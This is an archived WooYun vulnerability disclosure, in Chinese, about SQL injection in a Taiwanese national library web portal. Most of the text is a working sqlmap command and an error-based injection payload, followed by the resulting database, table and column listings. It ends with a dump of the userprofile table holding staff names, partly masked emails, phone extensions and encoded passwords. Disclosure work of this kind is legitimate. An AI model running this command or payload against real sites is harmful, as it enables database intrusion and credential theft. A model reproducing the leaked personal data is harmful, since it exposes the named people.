乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-18: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
台湾国家图书馆某处存在SQL注射漏洞(146个表\可获得用户名字,id及明文密码)
使用sqlmap进行测试,测试地址:http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421
python sqlmap.py -u "http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421" -p cnt_id --technique=E --random-agent --threads=10 -D catweb -T userprofile -C Fuser_id,Fuser_name,Fuser_passwd,Fuser_email,Fuser_phone --dump
---Parameter: cnt_id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: button_num=e2&folder_id=4&cnt_id=421' AND (SELECT 2004 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2004=2004,1))),0x716a6b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WPFI'='WPFI---web application technology: PHP 5.3.1, Apache 2.2.14back-end DBMS: MySQL 5.0current user: 'totoro@%'current user is DBA: False
web application technology: PHP 5.3.1, Apache 2.2.14back-end DBMS: MySQL 5.0available databases [7]:[*] catweb[*] catweb_test[*] cdcol[*] information_schema[*] mysql[*] phpmyadmin[*] test
web application technology: PHP 5.3.1, Apache 2.2.14back-end DBMS: MySQL 5.0Database: catweb[146 tables]+--------------------------------+| category_cake_item1 || category_cake_item2 || category_service_item1 || category_service_item2 || category_theme_item1 || category_theme_item2 || check_img || check_img_bak || groupacl || groupprofile || groupusers || listcontainer || log_lock || logedit || logonline || logsearch || logsystem || logusers || main_menushowconfig || menushowconfig || option_classify || option_document || option_field_type || option_item1 || option_item10 || option_item11 || option_item12 || option_item13 || option_item2 || option_item3 || option_item4 || option_item5 || option_item6 || option_item7 || option_item8 || option_item9 || option_mark || option_order_type || option_setlayout_acl || option_show_icon || option_style_additem || option_urltype || option_yesno || sys_content_sample || sys_country || sys_country_ip || sys_extend_search_keyword || sys_file || sys_folder_record || sys_folder_record_bak || sys_import_log || sys_layout_style || sys_layout_style_cnt || sys_layout_style_cnt_detail || sys_layoutc_temp_search_result || sys_meaning || sys_portal_b1 || sys_portal_b2 || sys_portal_c1 || sys_portal_c1_cnt || sys_portal_c1_cnt_detail || sys_portal_c1_document || sys_portal_c1_member || sys_portal_c2 || sys_portal_c2_cnt || sys_portal_c3 || sys_portal_d1 || sys_portal_d2 || sys_portal_d3 || sys_portal_d4 || sys_portal_d4_cnt || sys_portal_d5 || sys_portal_d7 || sys_portal_d7_cnt || sys_portal_d8 || sys_portal_e1 || sys_portal_e2 || sys_portal_e2_cnt || sys_portal_e2_cnt_bak || sys_portal_e3 || sys_portal_e3_cnt || sys_portal_e5 || sys_portal_e6 || sys_portal_e6_cnt || sys_portal_f1 || sys_portal_f1_cnt || sys_portal_f2 || sys_portal_f2_cnt || sys_portal_f3 || sys_portal_f4 || sys_portal_f4_cnt || sys_portal_f5 || sys_portal_f6 || sys_portal_g11 || sys_portal_g11_cnt || sys_portal_g12 || sys_portal_g12_cnt || sys_portal_g13 || sys_portal_g13_cnt || sys_portal_g7 || sys_portal_g7_cnt || sys_portal_g8 || sys_portal_g8_cnt || sys_portal_h1 || sys_portal_h1_addsendman || sys_portal_h1_cnt || sys_portal_h1_now_send_list || sys_portal_h1_now_send_log || sys_portal_h1_other_sendman || sys_portal_h1_sendinfo || sys_portal_h1_sendman || sys_portal_h1_sendman_cnt || sys_portal_h1_setdefine || sys_portal_h1_setfolder || sys_portal_h1_setfolder_cnt || sys_portal_i2 || sys_portal_i2_cnt || sys_portal_i3 || sys_portal_i3_cnt || sys_portal_i4 || sys_portal_i4_cnt || sys_portal_i5 || sys_portal_i5_cnt || sys_portal_i6 || sys_portal_i6_cnt || sys_portal_j1 || sys_portal_j1_cnt || sys_portal_j2 || sys_portal_j2_cnt || sys_portal_j4 || sys_portal_j5 || sys_portal_j5_cnt || sys_seo || sys_seo_bak || sys_set_e2_replace || sys_set_mail || sys_set_opentime || sys_setlayout || sys_setlayout_acl || sys_webhit_statistics || sys_webman_statistics || sys_website_search || systemvar || useracl || userprofile || userupload |+--------------------------------+
back-end DBMS: MySQL 5.0Database: catwebTable: userprofile[15 columns]+-------------------+------------------+| Column | Type |+-------------------+------------------+| Fdate_expired | date || Fdate_registered | date || Fis_show_menunote | varchar(2) || Fuser_cell | varchar(20) || Fuser_email | varchar(50) || Fuser_id | varchar(255) || Fuser_name | varchar(255) || Fuser_open | varchar(10) || Fuser_org | varchar(255) || Fuser_passwd | varchar(255) || Fuser_phone | varchar(50) || Fuser_rowid | int(10) unsigned || Fuser_title | varchar(50) || Fuser_type | varchar(8) || rank | int(30) |+-------------------+------------------+
back-end DBMS: MySQL 5.0Database: catwebTable: userprofile[11 entries]+----------+------------+--------------+--------------------------+-------------+| Fuser_id | Fuser_name | Fuser_passwd | Fuser_email | Fuser_phone |+----------+------------+--------------+--------------------------+-------------+| k5afoJ8= | 系統管理員 | k5SVaGNo | elvislin@**.**.**.** | <blank> || k5afoJ9n | 林詩綺 | k5afoJ9n | karenlin@**.**.**.** | <blank> || lZOmaGc= | 牛惠曼 | lZOmaGc= | nhmtku@**.**.**.** | 879 || lZOmaGk= | 龍秀瑛 | Y2Rlaw== | lsi@msg.**.**.**.** | 171 || lZOmaGQ= | 錢月蓮 | Y2Rlaw== | lien@**.**.**.** | 873 || lZOmamg= | 王怡芳 | lZOmamg= | <blank> | <blank> || lZOmaWo= | 費心琴 | lZOmaWo= | <blank> | <blank> || lZOmZ2g= | 吳海威 | lZOmZ2g= | cdnagoya@**.**.**.** | 177 || lZOmZ2k= | 陳慧文 | lZOmZ2k= | <blank> | <blank> || lZOmZ2Q= | 鄭玉玲 | lZOmZ2Q= | ylcheng@**.**.**.** | 872 || q6SenJY= | 李宜容主任 | Y2Rlaw== | yrlee@**.**.**.** | 167 |+----------+------------+--------------+--------------------------+-------------+
增加过滤
危害等级:高
漏洞Rank:15
确认时间:2015-10-19 23:15
感謝通報
暂无